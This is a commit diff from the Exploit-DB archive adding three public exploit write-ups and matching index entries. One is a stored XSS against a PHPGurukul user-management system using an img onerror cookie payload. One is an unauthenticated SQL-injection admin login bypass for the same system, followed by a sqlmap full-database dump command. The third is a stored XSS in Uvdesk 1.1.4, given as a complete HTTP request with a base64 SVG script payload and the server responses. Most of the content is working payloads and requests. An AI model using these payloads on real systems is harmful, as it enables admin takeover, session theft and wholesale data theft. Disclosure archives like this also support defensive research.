DB: 2023-08-25
4 changes to exploits/shellcodes/ghdb User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated) User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS) Uvdesk 1.1.4 - Stored XSS (Authenticated)
This commit is contained in:
Exploit-DB
parent
cb5ca4a416
commit
fe2c42ff0e
4 changed files with 215 additions and 0 deletions
33
exploits/php/webapps/51694.txt
Normal file
33
exploits/php/webapps/51694.txt
Normal file
|
|
@ -0,0 +1,33 @@
|
|||
# Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)
|
||||
# Google Dork: NA
|
||||
# Date: 19/08/2023
|
||||
# Exploit Author: Ashutosh Singh Umath
|
||||
# Vendor Homepage: https://phpgurukul.com
|
||||
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
|
||||
# Version: 3.0
|
||||
# Tested on: Windows 11
|
||||
# CVE : Requested
|
||||
|
||||
|
||||
Description
|
||||
|
||||
User Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable to
|
||||
Persistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.
|
||||
|
||||
POC
|
||||
|
||||
User side
|
||||
1. Go to the user registration page http://localhost/loginsystem.
|
||||
2. Enter <img src="x" onerror=alert(document.cookie)> in one of the
|
||||
fields (first name, last name, email, or contact).
|
||||
3. Click sign up.
|
||||
|
||||
Admin side
|
||||
1. Login to admin panel http://localhost/loginsystem/admin.
|
||||
2. After login successfully go to manage user page.
|
||||
3. Payload
|
||||
|
||||
|
||||
Thanks and Regards,
|
||||
|
||||
Ashutosh Singh Umath
|
||||
39
exploits/php/webapps/51695.txt
Normal file
39
exploits/php/webapps/51695.txt
Normal file
|
|
@ -0,0 +1,39 @@
|
|||
# Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)
|
||||
# Google Dork: NA
|
||||
# Date: 19/08/2023
|
||||
# Exploit Author: Ashutosh Singh Umath
|
||||
# Vendor Homepage: https://phpgurukul.com
|
||||
# Software Link:
|
||||
https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
|
||||
# Version: 3.0
|
||||
# Tested on: Windows 11
|
||||
# CVE : Requested
|
||||
|
||||
|
||||
Proof Of Concept:
|
||||
|
||||
1. Navigate to the admin login page.
|
||||
|
||||
URL: http://192.168.1.5/loginsystem/admin/
|
||||
|
||||
2. Enter "*admin' -- -*" in the admin username field and anything
|
||||
random in the password field.
|
||||
|
||||
3. Now you successfully logged in as admin.
|
||||
|
||||
4. To download all the data from the database, use the below commands.
|
||||
|
||||
4.1. Login to the admin portal and capture the request.
|
||||
|
||||
4.2. Copy the intercepted request in a file.
|
||||
|
||||
4.3. Now use the below command to dump all the data
|
||||
|
||||
|
||||
Command: sqlmap -r <file-name> -p username -D loginsystem --dump-all
|
||||
|
||||
|
||||
|
||||
Thanks and Regards,
|
||||
|
||||
Ashutosh Singh Umath
|
||||
140
exploits/php/webapps/51696.txt
Normal file
140
exploits/php/webapps/51696.txt
Normal file
|
|
@ -0,0 +1,140 @@
|
|||
# Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)
|
||||
# Date: 14/08/2023
|
||||
# Exploit Author: Hubert Wojciechowski
|
||||
# Contact Author: hub.woj12345@gmail.com
|
||||
# Vendor Homepage: https://www.uvdesk.com/
|
||||
# Software Link: https://github.com/MegaTKC/AeroCMS
|
||||
# Version: 1.1.4
|
||||
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
|
||||
|
||||
# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.
|
||||
|
||||
## Example XSS Stored in new ticket
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Param: reply
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Req
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
Content-Length: 812
|
||||
Cache-Control: max-age=0
|
||||
sec-ch-ua:
|
||||
sec-ch-ua-mobile: ?0
|
||||
sec-ch-ua-platform: ""
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Origin: http://127.0.0.1
|
||||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||||
Sec-Fetch-Site: same-origin
|
||||
Sec-Fetch-Mode: navigate
|
||||
Sec-Fetch-User: ?1
|
||||
Sec-Fetch-Dest: document
|
||||
Referer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
|
||||
Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3
|
||||
Connection: close
|
||||
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="threadType"
|
||||
|
||||
forward
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="status"
|
||||
|
||||
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="subject"
|
||||
|
||||
aaaa
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="to[]"
|
||||
|
||||
test@local.host
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="reply"
|
||||
|
||||
%3Cp%3E%3Cembed+src%3D%22data%3Aimage%2Fsvg%2Bxml%3Bbase64%2CPHN2ZyB4bWxuczpzdmc9Imh0dH+A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv+MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs+aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw+IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI%2BYWxlcnQoIlh+TUyIpOzwvc2NyaXB0Pjwvc3ZnPg%3D%3D%22+type%3D%22image%2Fsvg%2Bxml%22+width%3D%22300%22+height%3D%22150%22%3E%3C%2Fembed%3E%3C%2Fp%3E
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="pic"; filename=""
|
||||
Content-Type: application/octet-stream
|
||||
|
||||
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk
|
||||
Content-Disposition: form-data; name="nextView"
|
||||
|
||||
stay
|
||||
------WebKitFormBoundaryXCjJcGbgZxZWLsSk--
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Res:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
HTTP/1.1 302 Found
|
||||
Date: Mon, 14 Aug 2023 11:33:26 GMT
|
||||
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
|
||||
X-Powered-By: PHP/7.4.29
|
||||
Cache-Control: max-age=0, must-revalidate, private
|
||||
Location: /uvdesk/public/en/member/ticket/view/1
|
||||
Access-Control-Allow-Origin: *
|
||||
Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
|
||||
Access-Control-Allow-Headers: Access-Control-Allow-Origin
|
||||
Access-Control-Allow-Headers: Authorization
|
||||
Access-Control-Allow-Headers: Content-Type
|
||||
X-Debug-Token: bf1b73
|
||||
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/bf1b73
|
||||
X-Robots-Tag: noindex
|
||||
Expires: Mon, 14 Aug 2023 11:33:26 GMT
|
||||
Set-Cookie: sf_redirect=%7B%22token%22%3A%22bf1b73%22%2C%22route%22%3A%22helpdesk_member_add_ticket_thread%22%2C%22method%22%3A%22POST%22%2C%22controller%22%3A%7B%22class%22%3A%22Webkul%5C%5CUVDesk%5C%5CCoreFrameworkBundle%5C%5CController%5C%5CThread%22%2C%22method%22%3A%22saveThread%22%2C%22file%22%3A%22C%3A%5C%5Cxampp2%5C%5Chtdocs%5C%5Cuvdesk%5C%5Cvendor%5C%5Cuvdesk%5C%5Ccore-framework%5C%5CController%5C%5CThread.php%22%2C%22line%22%3A44%7D%2C%22status_code%22%3A302%2C%22status_text%22%3A%22Found%22%7D; path=/; httponly; samesite=lax
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Content-Length: 398
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<meta charset="UTF-8" />
|
||||
<meta http-equiv="refresh" content="0;url='/uvdesk/public/en/member/ticket/view/1'" />
|
||||
|
||||
<title>Redirecting to /uvdesk/public/en/member/ticket/view/1</title>
|
||||
</head>
|
||||
<body>
|
||||
Redirecting to <a href="/uvdesk/public/en/member/ticket/view/1">/uvdesk/public/en/member/ticket/view/1</a>.
|
||||
</body>
|
||||
</html>
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
Redirect and view response:
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
HTTP/1.1 200 OK
|
||||
Date: Mon, 14 Aug 2023 11:44:14 GMT
|
||||
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
|
||||
X-Powered-By: PHP/7.4.29
|
||||
Cache-Control: max-age=0, must-revalidate, private
|
||||
Access-Control-Allow-Origin: *
|
||||
Access-Control-Allow-Methods: GET,POST,PUT,OPTIONS
|
||||
Access-Control-Allow-Headers: Access-Control-Allow-Origin
|
||||
Access-Control-Allow-Headers: Authorization
|
||||
Access-Control-Allow-Headers: Content-Type
|
||||
X-Debug-Token: 254ce8
|
||||
X-Debug-Token-Link: http://127.0.0.1/uvdesk/public/_profiler/254ce8
|
||||
X-Robots-Tag: noindex
|
||||
Expires: Mon, 14 Aug 2023 11:44:14 GMT
|
||||
Connection: close
|
||||
Content-Type: text/html; charset=UTF-8
|
||||
Content-Length: 300607
|
||||
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>#1 vvvvvvvvvvvvvvvvvvvvv</title>
|
||||
[...]
|
||||
<p><embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" width="300" height="150"></embed></p>
|
||||
[...]
|
||||
-----------------------------------------------------------------------------------------------------------------------
|
||||
|
||||
XSS execute, we can reply ticket to victim. This payload can use in new articles, tickets, all application.
|
||||
|
|
@ -31333,6 +31333,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
49180,exploits/php/webapps/49180.txt,"User Registration & Login and User Management System 2.1 - Cross Site Request Forgery",2020-12-03,"Dipak Panchal",webapps,php,,2020-12-03,2020-12-07,0,,,,,,
|
||||
49052,exploits/php/webapps/49052.txt,"User Registration & Login and User Management System 2.1 - Login Bypass SQL Injection",2020-11-16,"Mayur Parmar",webapps,php,,2020-11-16,2020-11-16,0,,,,,,
|
||||
48932,exploits/php/webapps/48932.txt,"User Registration & Login and User Management System 2.1 - SQL Injection",2020-10-23,"Ihsan Sencan",webapps,php,,2020-10-23,2020-10-23,0,,,,,,
|
||||
51695,exploits/php/webapps/51695.txt,"User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
|
||||
51694,exploits/php/webapps/51694.txt,"User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)",2023-08-24,"Ashutosh Singh Umath",webapps,php,,2023-08-24,2023-08-24,1,,,,,,
|
||||
48914,exploits/php/webapps/48914.txt,"User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS",2020-10-20,yusufmalikul,webapps,php,,2020-10-20,2020-10-20,0,,,,,,
|
||||
19174,exploits/php/webapps/19174.py,"Useresponse 1.0.2 - Privilege Escalation / Remote Code Execution",2012-06-15,mr_me,webapps,php,,2012-06-15,2012-06-15,1,OSVDB-83162;OSVDB-82970;OSVDB-82969;OSVDB-82968,,,http://www.exploit-db.com/screenshots/idlt19500/2.png,,
|
||||
7530,exploits/php/webapps/7530.pl,"Userlocator 3.0 - Blind SQL Injection",2008-12-21,katharsis,webapps,php,,2008-12-20,2017-01-05,1,OSVDB-51232;CVE-2008-5863,,,,,
|
||||
|
|
@ -31348,6 +31350,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
|
|||
1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
|
||||
18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
|
||||
13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
|
||||
51696,exploits/php/webapps/51696.txt,"Uvdesk 1.1.4 - Stored XSS (Authenticated)",2023-08-24,"Hubert Wojciechowski",webapps,php,,2023-08-24,2023-08-24,0,,,,,,
|
||||
51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-08-02,1,CVE-2023-39147,,,,,
|
||||
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
|
||||
34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue